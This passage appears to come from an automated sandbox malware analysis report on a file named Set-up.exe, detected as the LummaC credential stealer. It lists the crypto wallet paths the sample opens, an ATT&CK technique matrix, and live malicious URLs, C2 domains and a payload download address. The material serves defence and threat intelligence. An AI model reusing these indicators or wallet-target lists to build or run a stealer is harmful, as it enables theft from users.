          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6544, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 6544, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Process Injection          		11
          Virtualization/Sandbox Evasion          		2
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services21
          Input Capture          		21
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Process Injection          		21
          Input Capture          		1
          Query Registry          		Remote Desktop Protocol1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Native API          		Logon Script (Windows)Logon Script (Windows)11
          Deobfuscate/Decode Files or Information          		Security Account Manager141
          Security Software Discovery          		SMB/Windows Admin Shares41
          Data from Local System          		3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          PowerShell          		Login HookLogin Hook3
          Obfuscated Files or Information          		NTDS11
          Virtualization/Sandbox Evasion          		Distributed Component Object Model2
          Clipboard Data          		114
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync23
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Set-up.exe32%ReversingLabsWin32.Spyware.Lummastealer

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://147.45.47.81/0%Avira URL Cloudsafe
          https://worddosofrm.shop/;8r100%Avira URL Cloudmalware
          https://worddosofrm.shop/?100%Avira URL Cloudmalware
          http://147.45.47.81/conhost.exeg0%Avira URL Cloudsafe
          https://worddosofrm.shop/apier100%Avira URL Cloudmalware
          http://147.45.47.81/V0%Avira URL Cloudsafe
          https://worddosofrm.shop:443/api2o4p.default-release/key4.dbPK100%Avira URL Cloudmalware
          https://worddosofrm.shop/O100%Avira URL Cloudmalware
          http://147.45.47.81/h0%Avira URL Cloudsafe
          http://147.45.47.81/conhost.exe100%Avira URL Cloudmalware
          https://worddosofrm.shop/:100%Avira URL Cloudmalware
          http://147.45.47.81/conhost.exes0%Avira URL Cloudsafe
          https://worddosofrm.shop/8100%Avira URL Cloudmalware
          https://worddosofrm.shop/100%Avira URL Cloudmalware
          https://worddosofrm.shop/apibu100%Avira URL Cloudmalware
          https://worddosofrm.shop/$100%Avira URL Cloudmalware
          http://www.microsoft.c(0%Avira URL Cloudsafe
          https://worddosofrm.shop:443/api100%Avira URL Cloudmalware
          corehairydu.icu0%Avira URL Cloudsafe
          http://147.45.47.81:80/conhost.exe100%Avira URL Cloudmalware
          http://ocsp.sectigo.com0)0%Avira URL Cloudsafe
          http://147.45.47.81/conhost.exe_0%Avira URL Cloudsafe
          https://worddosofrm.shop/apis100%Avira URL Cloudmalware
          https://worddosofrm.shop:443/api9100%Avira URL Cloudmalware
          https://worddosofrm.shop/api100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          worddosofrm.shop
          		104.21.16.142
          		truetrue
            		unknown
            corehairydu.icu
            		unknown
            		unknowntrue
              		unknown
              18.31.95.13.in-addr.arpa
              		unknown
              		unknownfalse
                		high
                50.23.12.20.in-addr.arpa
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  bakedstusteeb.shopfalse
                    		high
                    nightybinybz.shopfalse
                      		high
                      moutheventushz.shopfalse
                        		high
                        respectabosiz.shopfalse
                          		high
                          standartedby.shopfalse
                            		high
                            worddosofrm.shopfalse
                              		high
                              corehairydu.icutrue
                              • Avira URL Cloud: safe
                              		unknown
                              conceszustyb.shopfalse
                                		high
                                mutterissuen.shopfalse
                                  		high
                                  https://worddosofrm.shop/apitrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://html4/loose.dtdSet-up.exefalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabSet-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Set-up.exefalse
                                          		high
                                          http://147.45.47.81/VSet-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Set-up.exefalse
                                            		high
                                            http://ocsp.sectigo.com0Set-up.exefalse
                                              		high
                                              https://bitvise.com/versions/BvSshServer9Set-up.exefalse
                                                		high
                                                http://147.45.47.81/Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://crashpad.chromium.org/bug/newSet-up.exefalse
                                                  		high
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Set-up.exefalse
                                                    		high
                                                    http://schemas.xmlsoap.org/soap/envelope/Set-up.exefalse
                                                      		high
                                                      http://147.45.47.81/hSet-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://worddosofrm.shop/;8rSet-up.exe, 00000000.00000003.1862387198.0000000003B90000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1862515516.0000000003B91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Set-up.exefalse
                                                          		high
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Set-up.exe, 00000000.00000003.1862856862.00000000063DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://.cssSet-up.exefalse
                                                              		high
                                                              http://147.45.47.81/conhost.exeSet-up.exe, 00000000.00000002.2074270649.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074191589.0000000003B9A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2073967140.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072261487.0000000003BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newSet-up.exefalse
                                                                		high
                                                                https://worddosofrm.shop/apierSet-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://worddosofrm.shop/OSet-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Set-up.exefalse
                                                                  		high
                                                                  http://147.45.47.81/conhost.exegSet-up.exe, 00000000.00000002.2074270649.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072261487.0000000003BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://x1.c.lencr.org/0Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.i.lencr.org/0Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://worddosofrm.shop:443/api2o4p.default-release/key4.dbPKSet-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSet-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://worddosofrm.shop/?Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://worddosofrm.shop/:Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        http://147.45.47.81/conhost.exesSet-up.exe, 00000000.00000002.2074270649.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072261487.0000000003BB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://support.google.com/installer/%s?product=%s&error=%dSet-up.exefalse
                                                                          		high
                                                                          https://worddosofrm.shop/8Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://worddosofrm.shop:443/apiSet-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://bitvise.com/versions/BvSshClient9Set-up.exefalse
                                                                            		high
                                                                            https://support.mozilla.org/products/firefoxgro.allSet-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://.jpgSet-up.exefalse
                                                                                		high
                                                                                http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Set-up.exefalse
                                                                                  		high
                                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0Set-up.exefalse
                                                                                    		high
                                                                                    https://worddosofrm.shop/Set-up.exe, 00000000.00000003.1877863332.0000000006388000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1878766733.0000000006390000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877968146.000000000638C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1878288103.0000000006390000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877968146.000000000638F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877863332.000000000638F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://worddosofrm.shop/apibuSet-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://crashpad.chromium.org/Set-up.exefalse
                                                                                      		high
                                                                                      https://sectigo.com/CPS0Set-up.exefalse
                                                                                        		high
                                                                                        https://worddosofrm.shop/$Set-up.exe, 00000000.00000003.1877863332.0000000006388000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1877968146.000000000638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoSet-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/soap/encoding/Set-up.exefalse
                                                                                            		high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://147.45.47.81:80/conhost.exeSet-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://ocsp.rootca1.amazontrust.com0:Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.microsoft.c(Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072209586.0000000003B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Set-up.exe, 00000000.00000003.1862856862.00000000063DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.ecosia.org/newtab/Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://ocsp.sectigo.com0)Set-up.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSet-up.exe, 00000000.00000003.1894883673.00000000064AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://147.45.47.81/conhost.exe_Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://ac.ecosia.org/autocomplete?q=Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://m.google.com/devicemanagement/data/apiSet-up.exefalse
                                                                                                            		high
                                                                                                            https://bitvise.com/versions/BvSshClient9sCouldSet-up.exefalse
                                                                                                              		high
                                                                                                              http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSet-up.exefalse
                                                                                                                		high
                                                                                                                https://dl.google.com/update2/installers/icons/Set-up.exefalse
                                                                                                                  		high
                                                                                                                  https://support.microsofSet-up.exe, 00000000.00000003.1862856862.00000000063E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://support.google.com/installer/Set-up.exefalse
                                                                                                                      		high
                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Set-up.exe, 00000000.00000003.1893586414.00000000063B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://worddosofrm.shop:443/api9Set-up.exe, 00000000.00000002.2074208902.0000000003BA0000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946322208.0000000003B9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946070873.0000000003B95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1946226895.0000000003B9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Set-up.exe, 00000000.00000003.1863317505.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://worddosofrm.shop/apisSet-up.exe, 00000000.00000003.1960961934.0000000003BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          147.45.47.81
                                                                                                                          		unknownRussian Federation
                                                                                                                          		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                          104.21.16.142
                                                                                                                          		worddosofrm.shopUnited States
                                                                                                                          		13335CLOUDFLARENETUStrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1551389
                                                                                                                          Start date and time:2024-11-07 17:38:12 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 4m 31s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:4
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:Set-up.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@4/2
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 71%
                                                                                                                          • Number of executed functions: 25
                                                                                                                          • Number of non-executed functions: 281
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: Set-up.exe

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          11:39:18API Interceptor11x Sleep call for process: Set-up.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          147.45.47.81Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          • 147.45.47.81/conhost.exe
                                                                                                                          inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                          • 147.45.47.81/conhost.exe
                                                                                                                          BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                          • 147.45.47.81/WinRing0x64.sys
                                                                                                                          CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                          • 147.45.47.81/WinRing0x64.sys
                                                                                                                          XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                          • 147.45.47.81/WinRing0x64.sys
                                                                                                                          n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                                                          • 147.45.47.81/WinRing0x64.sys
                                                                                                                          lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                          • 147.45.47.81/xmrig.exe
                                                                                                                          SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                          • 147.45.47.81/xmrig.exe
                                                                                                                          installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                          • 147.45.47.81/WinRing0x64.sys
                                                                                                                          conhost.exeGet hashmaliciousXmrigBrowse
                                                                                                                          • 147.45.47.81/xmrig.exe
                                                                                                                          104.21.16.142SecuriteInfo.com.W32.MSIL_Kryptik.KHA.gen.Eldorado.19300.19769.exeGet hashmaliciousLummaCBrowse
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                worddosofrm.shopSecuriteInfo.com.W32.MSIL_Kryptik.KHA.gen.Eldorado.19300.19769.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.142

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                FREE-NET-ASFREEnetEU7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 147.45.44.131
                                                                                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 193.233.193.45
                                                                                                                                arm7-20241104-0018.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 193.233.193.45
